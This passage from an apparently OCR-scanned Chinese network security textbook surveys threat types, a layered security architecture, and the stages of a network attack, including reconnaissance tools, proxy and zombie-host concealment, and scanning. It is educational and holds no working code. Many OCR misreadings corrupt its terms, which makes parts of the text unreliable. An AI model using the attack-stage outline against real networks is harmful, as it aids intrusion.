目的 ,会 给 主机 带 来 巨大 破坏 。 

远程 人 侵 包括 非法 接 入 和 非法 访问 两 类 。 非 法 接 入 指 非 授权 人 员 连 接 到 网 络 系 统 内 
部 并 获得 访问 系统 内 部 资源 的 途径 , 它 通常 是 远程 人 侵 系统 的 前 奏 。 攻 击 者 可 以 通过 窃 
取 用 户口 令 、 接 入 交换 机 端口 .远程 VPN 接 入 和 利用 无 线 局 域 网 接 入 等 方式 非法 接 入 系 
统 。 非 法 访问 指 非 授权 用 户 通过 远程 登录 或 黑客 工具 远程 访问 主机 资源 ,造成 非法 访问 
的 主要 原因 有 恶意 代码 ,操作 系统 漏洞 .网 络 服务 程序 漏洞 和 安全 配置 错误 等 。 例 如 木马 
在 服务 端 运 行 后 ,可 以 接收 远程 客户 端 发 出 的 指令 ,在 服务 端 非法 访问 系统 资源 。 操 作 系 
统 漏洞 可 以 使 普通 用 户 获 得 特权 用 户 的 访问 权限 ,从 而 使 非 授权 用 户 访问 到 本 来 无 权 访 
问 的 资源 。 


1.2.3 拒绝 服务 攻击 


拒绝 服务 攻击 (Denial of Service,DoS) 即 攻击 者 想 办 法 让 目标 主机 或 系统 停止 提供 
服务 或 资源 访问 ,这 些 资源 包括 磁盘 空间 、 内 存 、 进 程 甚 至 网 络 带 宽 , 从 而 阻止 正常 用 户 的 
访问 。 一 类 是 对 网 络 带宽 进行 的 消耗 性 攻击 ,使 得 网 络 无 法 正常 传输 信息 。 例 如 ,攻击 者 
向 服务 器 发 送 大 量 IP 分 组 ,导致 正常 用 户 请 求 服务 的 分 组 无 法 到 达 该 服务 器 ,因而 无 法 
得 到 服务 。 该 类 攻击 目前 比较 难 解决 ,因为 此 类 攻击 是 由 于 网 络 协议 本 身 的 安全 缺陷 造 
成 的 。 另 一 类 是 利用 系统 漏洞 使 得 系统 崩溃 ,从 而 该 系统 无 法 继续 提供 有 效 服务 。 例 如 ， 
攻击 者 往往 利用 C 程序 中 存在 的 缓冲 区 溢出 漏洞 进行 攻击 ,发送 精心 编写 的 二 进 制 代 
码 ,导致 程序 崩溃 ,系统 停止 服务 。 


1.2.4 ”身份 假冒 


身份 假冒 分 为 IP 地 址 假冒 和 用 户 假冒 。IP 地 址 是 信息 发 送 者 的 重要 标识 符 , 接 收 
者 常用 IP 分 组 的 源 IP 地 址 来 确定 发 送 者 的 身份 。 攻 击 者 经 常用 不 存在 的 或 合法 用 户 的 
IP 地 址 ,作为 自己 发 送 的 IP 分 组 的 源 卫 地 址 ,由 于 网 络 的 路 由 协议 并 不 检查 IP 分 组 的 
源 IP 地 址 ,所 以 攻击 者 很 容易 进行 IP 欺骗 。 

网 络 世界 中 ,用 户 的 身份 信息 使 用 一 组 特定 的 数据 来 表示 ,系统 只 能 识别 用 户 的 数字 
身份 ,所 有 对 用 户 的 授权 也 是 针对 用 户 数字 身份 的 授权 。 身 份 鉴别 方法 包括 短信 口令 、 
态 密 码 、 智 能 卡 、 生 物 识别 等 ,攻击 者 往往 通过 社会 工程 学 方法 或 网 络 监 听 的 方式 窃取 这 
些 特定 数据 ,从 而 利用 这 些 数据 欺骗 远程 系统 ,达到 假冒 合法 用 户 的 目的 。 


1.2.5 信息 窃取 和 篡改 
信息 窃取 和 复 改 是 网 络 传输 过 程 面临 的 主要 安全 威胁 ,分 为 主动 攻击 和 被 动 攻击 两 
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类 。 信 息 窃取 和 流量 分 析 属于 被 动 攻击 。 因 为 IP 协议 在 设计 之 初 没有 考虑 安全 问题 , 攻 
击 者 只 要 在 通信 双方 的 物理 线路 上 安装 信号 接收 装置 即 可 窃听 通信 内 容 。 如 果 信 息 没 有 
加 密 , 则 信息 被 窃取 ; 如 果 信 息 经 过 适当 加 密 , 但 是 攻击 者 可 以 通过 分 析 窃 听 到 的 信息 模 
式 进 行 流量 分 析 , 可 能 推测 出 通信 双方 的 位 置 和 身份 并 观察 信息 的 频率 和 长 度 ,这 些 信息 
对 于 猜测 传输 过 程 的 某 些 性 质 很 有 帮助 。 窍 取 和 流量 分 析 属于 针对 保密 性 的 一 种 攻击 。 
被 动 攻击 非常 难以 检测 ,因为 它们 根本 不 改变 数据 ,通信 双方 都 不 知道 有 第 三 方 已 经 窃取 
了 信息 。 但 是 ,防范 这 些 攻 击 还 是 切实 可 行 的 ,因此 对 付 被 动 攻击 的 重点 是 防范 而 不 是 
检测 。 

主动 攻击 包括 重 放 (replay)、 自 改 . 冒充 ,伪造 和 阻 断 。 重 放 指 窃取 到 信息 后 按照 它 
之 前 的 顺序 重新 传输 ,以 此 进行 非 授权 访问 或 接 人 。 算 改 指 将 窃取 到 的 信息 进行 修改 、 延 
迟 或 重 排 ,再 发 给 接收 方 ,从 而 达到 非 授权 访问 或 接 入 的 目的 。 冒 充 通常 是 先 穷 取 到 认证 
过 程 的 全 部 信息 ,在 发 现 其 中 包含 有 效 的 认证 信息 流 后 重 放 这 些 信息 ,这 样 就 可 能 冒充 合 
法 用 户 的 身份 。 伪 造 指 攻击 者 冒充 合法 身份 在 系统 中 插入 虚假 信息 ,并 发 给 接收 方 。 重 
放 、 算 改 . 冒 充 和 伪造 都 是 针对 完整 性 的 攻击 。 阻 断 指 攻击 者 有 意 中 断 通信 双方 的 网 络 传 
输 过 程 ,是 针对 可 用 性 的 一 种 攻击 。 


1.3 网 络 安全 的 研究 内 容 


网 络 安全 研究 的 主要 内 容 与 分 类 如 图 1-2 所 示 。 它 涉及 网 络 安全 体系 、 网 络 攻击 技 
术 、 网 络 防 御 技术 、 密 码 技术 应 用 、 网 络 安全 应 用 等 方面 。 


1.3.1 网 络 安全 体系 


网 络 是 由 多 层 功能 组 合 而 成 的 复杂 系统 ,当前 互联 网 用 于 表示 不 同 网 络 功 能 层 之 间 
关系 的 网 络 体系 结构 是 TCP/IP 五 层 体系 结构 ,从 高 到 低 依次 是 应 用 层 、 传 输 层 、 网 络 层 、 
链 路 层 和 物理 层 。 任 何 一 种 单一 技术 都 无 法 有 效 解决 网 络 安 全 问题 ,必须 在 网 络 的 每 一 
层 增 加 相应 的 安全 功能 ,而 且 各 层 的 安全 功能 必须 相互 协调 ,相互 作用 ,构成 有 机 整体 ,这 
样 一 个 由 各 层 安全 功能 构成 的 有 机 整体 就 是 网 络 安全 体系 。 

构建 一 个 能 够 保证 网 络 内 用 户 不 受 攻击 ,机 密 信息 不 被 窍 取 ,所 有 网 络 服务 能 够 正常 
进行 的 安全 网 络 , 是 网 络 安全 研究 的 目标 ,但 是 实现 这 个 目标 非常 困难 。 可 能 针对 特定 网 
络 环境 ,可 以 构建 一 个 相对 有 效 的 网 络 安全 体系 ,但 是 无 法 构建 一 个 适用 于 所 有 网 络 应 用 
环境 的 网 络 安全 体系 ,所 以 研究 网 络 安全 体系 ,必须 与 具体 的 应 用 环境 相 结合 。 

根据 网 络 的 应 用 现状 和 TCP/IP 协议 结构 ,可 以 将 网 络 安全 体系 的 层次 划分 为 物理 
层 安 全 、 系 统 层 安全 、 网 络 层 安全 、 应 用 层 安 全 和 管理 层 安 全 ,每 个 层次 上 采取 若干 安全 服 
务 保证 该 系统 单元 的 安全 性 。 例 如 ,网 络 平台 需要 节点 之 间 的 认证 和 访问 控制 ; 应 用 平 
台 需 要 针对 用 户 进 行 身份 认证 、 访 问 控制 ,需要 保证 数据 传输 的 完整 性 和 保密 性 ,需要 有 
抗 抵赖 和 审计 功能 ,需要 保证 系统 的 可 用 性 和 可 靠 性 。 如 果 一 个 网 络 的 各 个 系统 单元 都 
有 相应 的 安全 措施 来 满足 安全 需要 ,那么 可 以 认为 该 网 络 是 安全 的 。 
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图 1-2 网 络 安全 研究 的 主要 内 容 


1. 物理 层 安全 

物理 层 安全 指 物理 环境 的 安全 性 ,包括 通信 线路 的 安全 、 物 理 设备 的 安全 和 机 房 安全 
等 。 主 要 包括 五 个 方面 : 

(1) 防盗 。 像 其 他 物体 一 样 ,主机 也 是 偷窃 者 的 目标 。 偷 窃 行 为 所 造成 的 损失 可 能 
远 远 超过 主机 本 身 的 价值 ,因此 必须 采取 严格 的 防范 措施 ,以 确保 主机 设备 不 会 丢失 。 

(2) 防火 。 机 房 发 生火 灾 一 般 是 由 于 电气 原因 、 人 为 事故 或 外 部 火灾 草 延 引起 。 电 
气 设备 和 线路 因为 短路 、. 过载、 接触 不 良 、 绝 缘 层 破坏 或 静电 等 原因 引起 电 打 火 而 导致 火 
灾 。 人 为 事故 是 指 由 于 操作 人 员 不 慎 , 吸 烟 、 乱 扔 烟头 等 ,使 存在 易 燃 物质 (如 纸 片 磁带 、 
胶片 等 ) 的 机 房 起 火 ,当然 也 不 排除 人 为 故意 放火 。 外 部 火灾 蔓延 是 因 外 部 房间 或 其 他 建 
筑 物 起 火 而 草 延 到 机 房 而 引起 火灾 。 

(3) 防 静 电 。 静 电 是 由 物体 间 的 相互 摩擦 、 接 触 而 产生 的 ,计算 机 显示 器 也 会 产生 很 
强 的 静电 。 静 电 产 生 后 ,由 于 未 能 释放 而 保留 在 物体 内 ,会 有 很 高 的 电位 (能 量 不 大 ) ,从 
而 产生 静电 放电 火花 ,造成 火灾 。 
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(4) 防 雷 击 。 雷 击 可 能 使 大 规模 集成 电器 损坏 ,这 种 损坏 可 能 是 在 不 知 不 觉 情况 下 
造成 的 。 利 用 引 雷 机 理 的 传统 避雷 针 防 雷 ,不 但 增加 雷击 概率 ,而 且 产 生 感 应 雷 , 而 感应 
雷 是 电子 信息 设备 被 损坏 的 主要 杀手 ,也 是 易 燃 易 爆 品 被 引 燃 起 爆 的 主要 原因 。 雷 击 防 
范 的 主要 措施 是 : 根据 电气 、 微 电子 设备 的 不 同 功能 及 不 同 受 保护 程序 和 所 属 保护 层 , 确 
定 防护 要 点 并 做 分 类 保护 ; 根据 雷电 和 操作 瞬间 过 电压 危害 的 可 能 通道 ,从 电源 线 到 数 
据 通信 线路 都 应 做 多 层 保护 。 

(5) 防 电磁 泄漏 。 电 子 计 算 机 和 其 他 电子 设备 一 样 ,工作 时 要 产生 电磁 发 射 。 电 磁 
发 射 包括 辆 射 发 射 和 传导 发 射 。 这 两 种 电磁 发 射 可 被 高 灵敏 度 的 接收 设备 接收 并 进行 分 
析 、 还 原 , 造 成 计算 机 的 信息 泄露 。 屏 项 是 防 电磁 泄漏 的 有 效 措施 ,屏蔽 主要 有 电 屏 项、. 磁 
屏 项 和 电磁 屏蔽 三 种 类 型 。 

2. 系统 层 安全 

系统 层 安全 指 操作 系统 的 安全 性 , 它 是 整个 网 络 与 计算 机 系统 的 安全 基础 ,没有 操作 
系统 的 安全 ,就 不 可 能 真正 解决 网 络 安全 和 其 他 应 用 软件 的 安全 问题 。 系 统 的 安全 问题 
主要 表现 在 三 方面 : 

(1) 及 时 修复 系统 漏洞 。 漏 洞 是 在 硬件 、 软 件 、 协 议 的 具体 实现 或 系统 安全 策略 上 存 
在 的 缺陷 ,从 而 可 以 使 攻击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 系 统 漏洞 是 指 操 
作 系 统 在 开发 过 程 中 存在 的 技术 缺陷 或 程序 错误 ,这 些 缺 陷 可 能 导致 其 他 用 户 非法 访问 
或 利用 病毒 攻击 计算 机 系统 ,从 而 穷 取 重 要 信息 ,甚至 破坏 操作 系统 。 如 果 系 统 存在 漏 
洞 ,必须 在 第 一 时 间 打上 漏洞 补丁 ,以 防止 恶意 代码 攻击 造成 损失 。 系 统管 理 员 需 要 经 常 
关注 操作 系统 供应 商 的 安全 公告 ,及 时 了 解 最 新 的 系统 漏洞 及 补丁 情况 ,避免 系统 受到 
攻击 。 

(2) 防止 系统 的 安全 配置 错误 。 现 代 操 作 系统 本 身 已 经 提供 一 定 的 访问 控制 .认证 
与 授权 等 方面 的 安全 服务 ,管理 员 必 须根 据 应 用 环境 的 安全 需求 对 这 些 服务 进行 安全 配 
置 ,使 系统 提供 的 服务 能 够 正确 应 付 各 种 人 侵 。 如 果 错 误 地 配置 了 这 些 服务 ,那么 这 些 安 
全 服务 无 法 生效 ,系统 也 就 处 于 危险 中 。 管 理 员 应 该 经 常 使 用 安全 配置 检查 工具 ,对 系统 
当前 配置 进行 检查 ,并 根据 应 用 环境 制定 相应 的 安全 策略 ,检查 系统 配置 是 否 与 预定 义 的 
安全 策略 保持 一 致 ,及 时 发 现 并 纠正 配置 中 可 能 存在 的 问题 。 

(3) 防止 病毒 对 系统 的 威胁 。 系 统 感染 病毒 后 ,会 出 现 运行 变 慢 ,资源 莫名 减少 的 问 
题 , 使 得 系统 可 用 性 大 大 降低 ,所 以 对 病毒 的 防护 是 系统 层 安全 的 重要 方面 。 系 统 必须 能 
及 时 进行 防毒 . 查 毒 和 杀毒 。 防 毒 指 根据 系统 特性 ,采取 相应 的 系统 安全 措施 预防 病毒 侵 
和 计算 机 ,可 以 准确 地 预警 通过 不 同 传输 媒介 下 载 到 本 地 的 病毒 ,在 病毒 人 侵 时 发 出 警 
报 ,并 及 时 隔离 或 清除 。 查 毒 指 对 于 确定 的 环境 ,能 够 准确 地 识别 病毒 名 称 ,该 环境 包括 
内 存 , 引 导 区 、 可 执行 文件 .文本 文件 或 网 络 等 。 杀 毒 指 根据 不 同类 型 病毒 对 感染 对 象 的 
修改 ,并 按照 病毒 的 感染 特性 所 进行 的 恢复 ,该 恢复 过 程 不 能 破坏 未 被 病毒 修改 的 内 容 。 

3. 网 络 层 安全 

网 络 层 安全 指 网 络 系统 的 安全 性 ,包括 身份 认证 、 访 问 控制 .数据 传输 的 保密 性 和 完 
整 性 .路 由 系统 安全 \ 人 侵 检测 和 防 病毒 技术 等 。 

(1) 身份 认证 : 也 称 为 “身份 验证 ”或 “身份 鉴别 ”, 指 在 计算 机 及 计算 机 网 络 系统 中 
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确认 操作 者 身份 的 过 程 , 从 而 确定 该 用 户 是 否 具有 对 某 种 资源 的 访问 和 使 用 权限 ,进而 使 
计算 机 和 网 络 系统 的 访问 策略 能 够 可 靠 有 效 地 执行 ,防止 攻击 者 假冒 合法 用 户 获得 资源 
的 访问 权限 ,保证 系统 和 数据 的 安全 以 及 授权 访问 者 的 合法 利益 。 

(2) 访问 控制 : 按 用 户 身份 及 其 所 归属 的 某 项 定义 组 来 限制 用 户 对 某 些 信息 项 的 访 
问 ,或 限制 对 某 些 控制 功能 的 使 用 的 一 种 技术 ,通常 用 于 系统 管理 员 控 制 用 户 对 服务 器 、 
目录 文件 等 网 络 资源 的 访问 。 其 功能 包括 : 防止 非法 的 主体 进入 受 保护 的 网 络 资源 ; 
加 允许 合法 用 户 访问 受 保护 的 网 络 资源 ; @ 防 止 合法 用 户 对 受 保护 的 网 络 资源 进行 非 授 
权 的 访问 。 

(3) 数据 传输 的 保密 性 和 完整 性 : 保密 性 指数 据 传输 过 程 中 ,传输 的 信息 按 给 定 要 
求 不 泄露 给 除 通 信 方 外 的 其 他 人 、 实 体 或 过 程 , 即 杜绝 有 用 信息 泄露 给 非 授 权 个 人 或 实 
体 ,强调 有 用 信息 只 被 通信 方 使 用 的 特征 。 完 整 性 指数 据 传输 过 程 中 ,保证 信息 或 数据 不 
会 被 未 授权 的 算 改 或 在 算 改 后 能 够 被 通信 方 检测 出 。 

(4) 路 由 系统 安全 : 路 由 器 是 一 种 网 络 交换 设备 ,用 于 连接 多 个 网 络 或 网 段 ,将 不 同 
网 络 或 网 段 之 间 的 信息 进行 翻译 ,以 使 它们 能 够 相互 读 懂 对 方 的 数据 ,从 而 构成 一 个 更 大 
的 网 络 。 它 是 网 络 系统 中 的 关键 节点 ,如 果 路 由 器 被 攻击 者 控制 ,意味 着 所 有 经 过 它 的 信 
息 都 可 能 会 被 窃听 和 算 改 ,从 而 破坏 数据 传输 的 保密 性 和 完整 性 。 路 由 系统 安全 分 为 路 
由 器 操作 系统 的 安全 和 路 由 信息 传输 的 安全 。 路 由 器 操作 系统 的 安全 包括 及 时 给 路 由 器 
打上 漏洞 补丁 ,根据 安全 策略 检测 路 由 的 安全 配置 是 否 正确 ; 路 由 信息 传输 的 安全 主要 
是 保证 路 由 信息 的 保密 性 和 完整 性 ,防止 攻击 者 发 送 和 传播 伪造 路 由 。 

(5) 入 侵 检测 : 是 对 入 侵 行 为 的 检测 。 它 通过 收集 和 分 析 网 络 行为 、 安 全 日 志 、 审 计 
数据 、 其 他 网 络 上 可 以 获得 的 信息 以 及 系统 中 若干 关键 点 的 信息 ,检查 网 络 或 系统 中 是 否 
存在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 它 是 一 种 积极 主动 的 安全 防护 技术 ,提供 了 
对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 ,在 网 络 系统 受到 危害 之 前 拦截 和 响应 人 侵 。 
入 侵 检 测 必须 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进行 监测 。 

(6) 防 病毒 技术 : 网 络 防 病毒 的 原理 主要 是 监控 和 扫描 ,通过 网 络 中 的 大 量 客户 端 
对 网 络 中 软件 行为 的 异常 监测 ,获取 病毒 的 最 新 信息 ,推送 到 服务 端 进行 自动 分 析 和 处 
理 , 再 把 这 些 病毒 的 解决 方案 分 发 到 每 一 个 客户 端 。 未 来 杀毒 软件 将 无 法 有 效 地 处 理 日 
益 增 多 的 恶意 程序 ,识别 和 查 杀 病 毒 不 仅仅 依靠 服务 端 本 地 硬盘 中 的 病毒 库 ,而 是 依靠 庞 
大 的 网 络 服务 ,实时 进行 采集 、 分 析 以 及 处 理 , 把 网 络 变 成 一 个 巨大 的 “杀毒 软件 ”, 参 与 者 
越 多 ,网 络 就 越 安全 。 现 有 防 病毒 技术 主要 有 脱 壳 技术 、 自 我 保护 技术 、 主 动 防御 技术 、 启 
发 技术 、 虚 拟 机 技术 和 人 工 智能 技术 。 

4. 应 用 层 安 全 

应 用 层 安 全 主要 指 网 络 系统 应 用 软件 和 数据 库 的 安全 性 ,包括 Web 安全 .DNS 安全 
和 邮件 系统 安全 等 。 

(1) Web 安全 : 互联 网 中 的 Web 服务 使 用 HTTP 传输 数据 ,该 协议 的 设计 目标 是 灵 
活 实 时 地 传送 文件 ,没有 考虑 安全 因素 。 但 是 ,基于 HTTP 的 Web 应 用 都 期 望 提供 身份 
认证 ,因此 而 导致 Web 应 用 存在 诸多 安全 隐患 ,例如 ,账号 和 密码 信息 未 经 加 密 即 在 客户 
和 服务 器 之 间 传 输 。HTTP 是 无 状态 的 协议 ,同一 个 客户 的 不 同 请 求 之 间 没 有 对 应 关 
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系 , 使 得 基于 Web 的 身份 冒充 非常 容易 。 另 外 , Web 应 用 程序 可 能 存在 诸多 安全 漏洞 ， 
导致 基于 Web 的 攻击 频繁 发 生 ,常见 的 有 SQL 注入 攻击 、 跨 站 脚本 攻击 和 跨 站 伪造 请 
求 等 。 

(2) DNS 安全 : 由 于 互联 网 依赖 DNS 提供 域名 解析 ,因此 DNS 的 安全 性 极为 重要 。 
DNS 的 安全 问题 主要 包括 防止 DNS 欺骗 和 防御 DoS 攻击 。 由 于 DNS 不 提供 客户 与 服 
务 器 之 间 的 身份 认证 ,一 方面 ,攻击 者 可 以 伪造 假 的 DNS 应答 给 DNS 查询 方 ,将 用 户 引 
导 到 错误 的 站 点 ,对 用 户 进行 进一步 欺骗 ; 另 一 方面 ,攻击 者 可 以 算 改 服务 器 中 的 缓存 记 
录 来 欺骗 DNS 查询 方 ,因为 DNS 优先 返回 缓存 中 已 经 存在 的 记录 。DoS 攻击 是 目前 最 
为 普遍 的 攻击 手段 ,目标 是 使 得 DNS 服务 器 无 法 正常 工作 ,从 而 影响 目标 网 络 的 正常 运 
转 。 通 常 采取 的 防御 手段 包括 使 用 备份 域名 服务 器 、 最 小 权限 原则 、 限 制 区 域 传输 、 最 少 
服务 原则 等 。 

(3) 邮件 系统 安全 : 针对 邮件 系统 的 攻击 分 为 直接 攻击 和 间接 攻击 。 直 接 攻击 包括 
窃取 邮箱 密码 ,截获 邮件 内 容 、 伪 造 邮件 内 容 、 发 送 垃 圾 邮件 等 ,主要 是 由 于 邮件 收发 协议 
如 SMTP、POP3 存在 先天 的 安全 隐患 , 仅 考虑 如 何 可 靠 和 及 时 地 收发 报 文 ,没有 考虑 加 
密 和 认证 等 安全 技术 。 间 接 攻击 主要 是 通过 邮件 传输 病毒 或 木马 等 恶意 程序 ,将 恶意 代 
码 放 在 邮件 附件 中 或 者 伪造 成 网 页 和 链接 ,诱骗 用 户 点 击 。 目 前 采用 的 防御 手段 包括 服 
务 端 提 供 验证 和 过 滤 机 制 . 邮 件 病 毒 扫 描 、 端 到 端的 安全 电子 邮件 协议 (如 PGP、S/ 
MIME) 等 。 

5. 管理 层 安全 

管理 层 安全 涉及 的 内 容 较 多 ,包括 技术 和 设备 的 管理 ,管理 制度 、 部 门 与 人 员 的 组 织 
规则 等 。 尤 其 是 安全 管理 的 制度 化 在 网 络 安全 中 有 着 不 可 忽视 的 作用 ,严格 的 安全 管理 
制度 责任 明确 的 部 门 安全 职责 、 合 理 的 人 员 角 色 配 置 ,都 可 以 有 效 地 增强 网 络 的 安全 性 。 


1.3.2 网 络 攻击 技术 


网 络 攻击 是 指 对 网 络 的 保密 性 、 完 整 性 、 不 可 抵赖 性 可用性、 可 控 性 产生 危害 的 任何 
行为 ,可 抽象 分 为 信息 泄露 、 完 整 性 破坏 .拒绝 服务 攻击 和 非法 访问 四 种 基本 类 型 。 网 络 
攻击 的 基本 特征 是 : 由 攻击 者 发 起 并 使 用 一 定 的 攻击 工具 ,对 目标 网 络 系统 进行 攻击 访 
问 ,并 呈现 出 一 定 的 攻击 效果 ,实现 了 攻击 者 的 攻击 意图 。 

网 络 攻击 方式 一 般 可 分 为 读 取 攻击 、 操 作 攻 击 、 欺 骗 攻 击 、 泛 洪 攻 击 、 重 定向 攻击 和 
Rootkits 技术 等 。 

(1) 读 取 攻 击 : 用 于 侦察 和 扫描 ,识别 目标 主机 运行 的 网 络 服 务 以 及 可 能 的 漏洞 。 

(2) 操作 攻击 : 以 算 改 数据 为 手段 ,攻击 以 特权 身份 运行 的 服务 程序 ,取得 程序 的 控 
制 权 ,如 SQL 注入 ,缓冲 区 溢出 攻击 。 

(3) 欺骗 攻击 : 将 自身 伪装 成 其 他 用 户 实施 攻击 行为 ,冒充 特权 用 户 入 侵 系统 。 典 
型 的 欺骗 攻击 如 ARP 欺骗 .DNS 欺骗 .IP 欺骗 和 网 络 钓鱼 等 。 

(4) 泛 洪 攻击 : 目的 是 让 远程 主机 无 法 承受 巨大 的 流量 而 瘫痪 ,如 Smurf 攻击 、TCP 
SYN Flood 和 DDoS 攻击 等 。 

(5) 重 定向 攻击 : 将 发 往 目 标的 信息 全 部 重 定向 到 攻击 者 指定 的 目标 主机 上 ,有 利 
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于 展开 下 一 步 攻击 。 如 ARP 重 定向 是 欺骗 受害 主机 ,将 攻击 者 主机 伪装 成 网 关 , 从 而 截 
获 所 有 受害 主机 发 往 互 联网 的 报 文 。 

(6) Rootkits 技术 : Rootkits 是 用 于 隐藏 自身 及 指定 文件 .进程 和 链接 的 恶意 软件 工 
具 集 , 集 多 种 攻击 技术 于 一 体 , 常 与 其 他 恶意 代码 结合 使 用 ,分 为 进程 注入 式 和 驱动 级 。 
驱动 级 Rootkits 较为 复杂 , 且 加 载 级 别 较 高 , 现 阶 段 还 没有 较 好 的 解决 办 法 。 

网 络 攻击 的 常用 手段 包括 : 

(1) 网 络 监听 。 大 多 数 网 络 通信 采用 未 经 加 密 的 明文 通信 ,因此 只 要 攻击 者 获取 
数据 通信 的 传输 路 径 即 可 轻易 实现 监听 ,监听 型 攻击 会 造成 数据 泄露 ,危及 敏感 数据 
安全 。 

(2) 自 改 数据 。 攻 击 者 对 截获 的 数据 进行 修改 ,并 使 得 数据 收发 双方 无 法 察觉 。 

(3) 网 络 欺骗 。 常 见 的 欺骗 攻击 主要 有 IP 欺骗 ,ARP 欺骗 ,DNS 欺骗 .路 由 欺骗 .网 
络 钓鱼 。 

(4) 弱 口 令 攻击 。 攻 击 者 通过 各 种 方式 成 功 获取 和 破解 合法 用 户 的 口令 ,从 而 冒充 
合法 用 户 进入 系统 。 

(5) 拒绝 服务 。 破 坏 性 攻击 ,直接 使 目标 系统 停止 工作 或 耗 尽 目标 网 络 的 带宽 使 之 
无 法 为 正常 请 求 提供 服务 。 

(6) 漏洞 破解 。 利 用 系统 漏洞 实施 攻击 ,获取 系统 访问 权限 。 

(7) 木马 攻击 。 在 正常 的 Web 页 面 或 聊天 界面 中 植 人 恶意 代码 或 链接 , 诱 使 用 户 查 
看 或 点 击 , 然 后 自动 下 载 木马 程序 到 目标 用 户主 机 ,使 得 攻击 者 可 以 通过 木马 远程 控制 用 
户主 机 。 

实施 网 络 攻击 的 过 程 虽然 复杂 多 变 , 但 是 仍 有 规律 可 循 。 一 次 成 功 的 网 络 攻击 通常 
包括 信息 收集 、 网 络 隐身 .端口 和 漏洞 扫描 、 实 施 攻 击 .设置 后 门 和 痕迹 清除 等 步骤 。 网 络 
攻击 的 一 般 流程 如 图 1-3 所 示 。 

1. 信息 收集 

信息 收集 指 通过 各 种 方式 获取 目标 主机 或 网 络 的 信息 ,属于 攻击 前 的 准备 阶段 ,也 是 
一 个 关键 的 环节 。 首 先 要 确定 攻击 目的 , 即 明确 要 给 对 方形 成 何 种 后 果 , 有 的 可 能 是 为 了 
获取 机 密 文件 信息 ,有 的 可 能 是 为 了 破坏 系统 完整 性 ,有 的 可 能 是 为 了 获得 系统 的 最 高 权 
限 。 其 次 是 尽 可 能 多 地 收集 各 种 与 目标 系统 有 关 的 信息 ,形成 对 目标 系统 的 粗略 性 认识 。 
收集 的 信息 通常 包括 : 

(1) 网 络 接 人 方式 : 拨号 接 入 无 线 局 域 网 接 入 以太 网 接 入 、VPN 远程 接 人 等 。 

(2) 目标 网 络 信息 : 域名 范围 IP 地 址 范围 .具体 地 理 位 置 等 。 

(3) 网 络 拓扑 结构 : 交换 设备 类 型 .设备 生产 厂家 ,传输 网 络 类 型 等 。 

(4) 网 络 用 户 信息 : 邮件 地 址 范围 用户 账 号 密码 等 。 

收集 信息 的 方式 包括 : 

(1) 使 用 常见 的 搜索 引擎 ,如 Google、 必 应 、 百 度 等 。 

(2) 使 用 dmitry、recon-ng 等 工具 通过 whois 服务 器 查询 主机 的 具体 域名 和 地 理 
信息 。 


(3) 使 用 netdiscover 等 工具 查询 主机 的 IP 地 址 范围 ,使 用 dnsmap、dnswalk、dig 等 
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攻击 实施 
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实施 具体 攻击 行为 





图 1-3 网 络 攻击 的 一 般 流 程 


工具 查询 域名 空间 。 

(4) 使 用 社会 工程 学 手段 获得 有 关 社 会 信息 ,如 网 站 所 属 公司 的 名 称 、 规 模 , 管 理 员 
的 生活 习惯 \ 电 话 号 码 等 ,maltego 就 是 一 款 收 集 此 类 社会 信息 的 查询 工具 。 

2. 网 络 隐 身 

网 络 隐身 通常 指 在 网 络 中 隐藏 自己 真实 的 IP 地 址 ,使 受害 者 无 法 反 向 追踪 到 攻击 
者 。 常 用 方法 包括 : 

(1) IP 假冒 或 次 用 。TCP/IP 协议 不 检查 源 IP 地 址 ,所 以 攻击 者 可 以 定制 一 个 虚假 
源 IP; 有 的 访问 控制 系统 会 设置 IP 访问 黑 名 单 , 攻 击 者 可 以 修改 IP 地 址 从 而 绕 过 该 
机 制 。 

(2) MAC 地 址 盗用 。 有 些 网 络 接 和 人 系统 针对 MAC 地 址 做 限制 ,攻击 者 通过 修改 自 
身 主 机 的 MAC 地 址 即 可 以 冒充 合法 主机 接 和 人 目标 网 络 ,从 而 发 起 攻击 。 

(3) 代理 隐藏 。 攻 击 者 收集 目标 信息 时 ,通常 通过 免费 代理 进行 ,即使 被 管理 员 发 
现 ,也 仅 是 发 现代 理 地 址 ,而 不 会 发 现 攻 击 者 的 真实 IP; 如 果 攻 击 者 通过 多 个 代理 级 联 ， 
那么 就 更 加 难以 追踪 ; Windows 下 常见 代理 有 Sockscap、Wingate、CCProxy 等 ,Linux 下 
有 Proxychains、Burpsuite 等 。 

(4) 冒充 真实 用 户 。 通 过 监听 或 破解 网 络 合法 用 户 的 账号 和 口令 后 ,利用 该 账户 进 
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(5) 僵尸 机 器 。 入 侵 互 联网 上 的 某 台 僵尸 主机 ,通过 该 主机 进行 攻击 ,并 在 该 主机 上 
清除 所 有 与 攻击 者 有 关 的 痕迹 ,即使 目标 系统 的 管理 员 发 现 了 攻击 行为 ,也 只 能 看 到 僵尸 
机 器 的 IP 地址 ,而 发 现 不 了 攻击 者 的 真实 地 址 。 

3. 端口 和 漏洞 扫描 

扫描 首先 要 确定 主机 的 操作 系统 类 型 和 版 本 ,提供 哪些 服务 、 服 务 软件 的 类 型 和 版 本 
等 信息 ,然后 检测 这 些 系 统 软件 和 服务 软件 的 版 本 是 否 存 在 已 经 公开 的 漏洞 ,并 且 漏 洞 还 
没有 及 时 打上 补丁 。 

因为 网 络 服务 基于 TCP/UDP 端口 开放 ,所 以 判定 目标 服务 是 否 开 启 就 演变 为 判定 
目标 主机 的 对 应 端口 是 否 开 启 。 端 口 扫描 检测 有 关 端 口 是 打开 还 是 关闭 , 现 有 端口 扫描 
工具 还 可 以 在 发 现 端 口 打开 后 ,继续 发 送 探 测报 文 ,判定 目标 端口 运行 的 服务 类 型 和 版 本 
信息 ,如 经 典 扫描 工具 nmap, 及 其 图 形 化 工具 zenmap 和 sparta 都 支持 服务 类 型 和 版 本 
的 判定 。 通 过 对 主机 发 送 多 种 不 同 的 探测 报 文 ,根据 不 同 操作 系统 的 响应 情况 ,可 以 产生 
操作 系统 的 “网 络 指纹 ”, 从 而 识别 不 同系 统 的 类 型 和 版 本 ,这 项 工作 通常 由 端口 扫描 工具 
完成 。 

漏洞 扫描 是 指 基 于 已 有 漏洞 数据 库 , 对 指定 的 远程 或 者 本 地 计算 机 系统 的 安全 脆弱 
